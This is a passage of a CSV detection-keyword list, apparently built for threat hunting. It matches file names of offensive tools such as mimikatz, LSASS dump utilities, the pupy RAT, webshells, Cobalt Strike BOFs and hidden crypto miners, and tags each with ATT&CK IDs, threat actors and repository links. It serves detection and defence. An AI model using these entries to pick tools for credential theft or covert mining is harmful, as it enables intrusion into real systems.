pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16583" "*\mimidogz-master*",".{0,1000}\\mimidogz\-master.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","16584" "*\mimidropper.hta*",".{0,1000}\\mimidropper\.hta.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","16585" "*\mimidrv.pdb*",".{0,1000}\\mimidrv\.pdb.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16586" "*\mimikatz.bin*",".{0,1000}\\mimikatz\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense 
Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","16587" "*\mimikatz.exe*",".{0,1000}\\mimikatz\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","mimikatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16588" "*\mimikatz.py*",".{0,1000}\\mimikatz\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16589" "*\mimikatz.py*",".{0,1000}\\mimikatz\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","16590" "*\mimilib.dll*",".{0,1000}\\mimilib\.dll.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","16591" "*\mimipy.py*",".{0,1000}\\mimipy\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - 
T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","16592" "*\mine_aleph.bat*",".{0,1000}\\mine_aleph\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16593" "*\mine_beam.bat*",".{0,1000}\\mine_beam\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16594" "*\mine_bittube.bat*",".{0,1000}\\mine_bittube\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16595" "*\mine_btg.bat*",".{0,1000}\\mine_btg\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16596" "*\mine_cortex.bat*",".{0,1000}\\mine_cortex\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16597" "*\mine_ergo.bat*",".{0,1000}\\mine_ergo\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU 
Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16598" "*\mine_etc.bat*",".{0,1000}\\mine_etc\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16599" "*\mine_eth.bat*",".{0,1000}\\mine_eth\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16600" "*\mine_eth_lhr_admin.bat*",".{0,1000}\\mine_eth_lhr_admin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16601" "*\mine_ethw.bat*",".{0,1000}\\mine_ethw\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16602" "*\mine_ethw_lhr_admin.bat*",".{0,1000}\\mine_ethw_lhr_admin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16603" "*\mine_flux.bat*",".{0,1000}\\mine_flux\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU 
Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16604" "*\mine_flux_admin.bat*",".{0,1000}\\mine_flux_admin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16605" "*\mine_gram.bat*",".{0,1000}\\mine_gram\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16606" "*\mine_grin_32.bat*",".{0,1000}\\mine_grin_32\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16607" "*\mine_ironfish.bat*",".{0,1000}\\mine_ironfish\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16608" "*\mine_ironfish_gram.bat*",".{0,1000}\\mine_ironfish_gram\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16609" "*\mine_karlsen.bat*",".{0,1000}\\mine_karlsen\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU 
Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16610" "*\mine_nexa.bat*",".{0,1000}\\mine_nexa\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16611" "*\mine_nexa_with_oc.bat*",".{0,1000}\\mine_nexa_with_oc\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16612" "*\mine_pyrin.bat*",".{0,1000}\\mine_pyrin\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16613" "*\mine_radiant.bat*",".{0,1000}\\mine_radiant\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16614" "*\mine_rth.bat*",".{0,1000}\\mine_rth\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16615" "*\mine_ubq.bat*",".{0,1000}\\mine_ubq\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU 
Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16616" "*\mine_zcl.bat*",".{0,1000}\\mine_zcl\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","16617" "*\MineDownloader.vbs*",".{0,1000}\\MineDownloader\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16618" "*\MinerETH.cs*",".{0,1000}\\MinerETH\.cs.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","16619" "*\MinerXMR.cs*",".{0,1000}\\MinerXMR\.cs.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","16620" "*\Minidump.exe 
c:\*",".{0,1000}\\Minidump\.exe\sc\:\\.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","16628" "*\Minidump.exe"" c:\*",".{0,1000}\\Minidump\.exe\""\sc\:\\.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","16629" "*\MiniDump.ps1*",".{0,1000}\\MiniDump\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","16630" "*\MiniDump-main*",".{0,1000}\\MiniDump\-main.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","16631" "*\minidump-rs.exe*",".{0,1000}\\minidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - 
TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16632" "*\MiniDumpToMem.cs*",".{0,1000}\\MiniDumpToMem\.cs.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16633" "*\mipsel_agent*",".{0,1000}\\mipsel_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","16634" "*\MirrorDump.csproj*",".{0,1000}\\MirrorDump\.csproj.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16635" "*\MirrorDump.exe*",".{0,1000}\\MirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16636" "*\MirrorDump.sln*",".{0,1000}\\MirrorDump\.sln.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping 
tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16637" "*\MirrorDump\MinHook*",".{0,1000}\\MirrorDump\\MinHook.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16638" "*\MirrorDump\MiniDump\*",".{0,1000}\\MirrorDump\\MiniDump\\.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16639" "*\MirrorDump-master*",".{0,1000}\\MirrorDump\-master.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","16640" "*\MiTM.java*",".{0,1000}\\MiTM\.java.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost 
Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","16641" "*\MITMRecorder.py*",".{0,1000}\\MITMRecorder\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","16642" "*\MLRatClient.exe*",".{0,1000}\\MLRatClient\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16644" "*\mobaxterm.py*",".{0,1000}\\mobaxterm\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16647" "*\Mockingjay_BOF.*",".{0,1000}\\Mockingjay_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - 
Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","16648" "*\modifiableautorun.o*",".{0,1000}\\modifiableautorun\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","16649" "*\Module_Stomping.py*",".{0,1000}\\Module_Stomping\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","16650" "*\Modules\Backdoor.cs*",".{0,1000}\\Modules\\Backdoor\.cs.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","16651" "*\monkey.exe *",".{0,1000}\\monkey\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","16652" "*\monkey32.exe*",".{0,1000}\\monkey32\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","16653" "*\monkey64.exe*",".{0,1000}\\monkey64\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","0","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","16654" "*\Moriarty.exe*",".{0,1000}\\Moriarty\.exe.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows 